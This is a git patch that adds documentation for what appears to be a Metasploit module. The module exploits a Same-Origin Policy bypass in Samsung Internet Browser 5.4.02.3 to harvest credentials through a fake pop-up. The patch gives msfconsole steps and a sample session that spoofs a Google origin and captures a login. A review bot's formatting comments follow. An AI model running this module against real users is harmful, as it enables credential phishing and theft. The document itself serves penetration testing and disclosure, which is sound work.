From 6b54fe67753404b73fbf6e4ad678e1aa78c7746a Mon Sep 17 00:00:00 2001 From: RootUp Date: Sat, 16 Dec 2017 22:26:08 +0530 Subject: [PATCH] Create samsung_browser_sop_bypass.md --- .../gather/samsung_browser_sop_bypass.md | 57 +++++++++++++++++++ 1 file changed, 57 insertions(+) create mode 100644 documentation/modules/auxiliary/gather/samsung_browser_sop_bypass.md diff --git a/documentation/modules/auxiliary/gather/samsung_browser_sop_bypass.md b/documentation/modules/auxiliary/gather/samsung_browser_sop_bypass.md new file mode 100644 index 0000000000..04bef5df90 --- /dev/null +++ b/documentation/modules/auxiliary/gather/samsung_browser_sop_bypass.md 
@@ -0,0 +1,57 @@ +## Description +This module takes advantage of a Same-Origin Policy (SOP) bypass vulnerability in the Samsung Internet Browser, a popular mobile browser shipping with Samsung Android devices. +By default, it initiates a redirect to a child tab, and rewrites the innerHTML to gather credentials via a fake pop-up and the gather credentials is stored in `creds` + +## Vulnerable Application +This Modules was tested on Samsung Internet Browser 5.4.02.3 during development of this module. + +## Verification Steps +1. Start `msfconsole -q` +2. `use auxiliary/gather/samsung_browser_sop_bypass` +3. `set SRVHOST` +4. `set SRVPORT` +5. `set URIPATH` +6. `set TARGET_URL` +5. `run` + +## Scenarios +``` +$ sudo msfconsole -q +msf > use auxiliary/gather/samsung_browser_sop_bypass +msf auxiliary(samsung_browser_sop_bypass) > set SRVHOST 192.168.1.104 +SRVHOST => 192.168.1.104 +msf auxiliary(samsung_browser_sop_bypass) > set SRVPORT 9090 +SRVPORT => 9090 +msf auxiliary(samsung_browser_sop_bypass) > set URIPATH / +URIPATH => / +msf auxiliary(samsung_browser_sop_bypass) > set TARGET_URL https://www.google.com/csi +TARGET_URL => https://www.google.com/csi +msf auxiliary(samsung_browser_sop_bypass) > run +[*] Auxiliary module execution completed +msf auxiliary(samsung_browser_sop_bypass) > +[*] Using URL: http://192.168.1.104:9090/ +[*] Server started. 
+[*] 192.168.1.101: Request 'GET /' +[*] 192.168.1.101: Attempting to spoof origin for https://www.google.com/csi +[*] 192.168.1.101: Request 'GET /favicon.ico' +[*] 192.168.1.101: Attempting to spoof origin for https://www.google.com/csi +[*] 192.168.1.101: Request 'GET /favicon.ico' +[*] 192.168.1.101: Attempting to spoof origin for https://www.google.com/csi +[+] 192.168.1.101: Collected credential for 'https://www.google.com/csi' emailID:MyStrongPassword + +msf auxiliary(samsung_browser_sop_bypass) > creds +Credentials +=========== + +host origin service public private realm private_type +---- ------ ------- ------ ------- ----- ------------ + emailID MyStrongPassword https://www.google.com/csi Password + +msf auxiliary(samsung_browser_sop_bypass) > +``` + +## Demos + +Working of MSF Module: `https://youtu.be/ulU98cWVhoI` + +Vulnerable Browser: `https://youtu.be/lpkbogxJXnw`
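Review bot: The Verification Steps list is misnumbered: `run` is labelled `5.` after `6. set TARGET_URL`, so the rendered list reads 1 to 6 and then 5 again; it should be step 7. In the same list, steps 3 to 6 are bare `set SRVHOST`, `set SRVPORT`, `set URIPATH` and `set TARGET_URL`, with no value and no explanation. A short Options section would help, at least for `TARGET_URL`, since the Scenarios output is the only place that shows what it is expected to hold. In the Description, "the gather credentials is stored in `creds`" should read along the lines of "the gathered credentials are stored in `creds`", and under Vulnerable Application "This Modules was tested" should be "This module was tested". That section names only the tested version (5.4.02.3); please say whether other versions are affected or whether this is the only one verified, so readers can tell if their devices are exposed. In the Scenarios output, the `creds` table has empty `host`, `origin` and `service` columns while the target URL appears under `realm`; if that is how the module stores the credential, a one-line comment would save readers from assuming the output was truncated. The Demos URLs are wrapped in backticks, so they will render as code rather than as links.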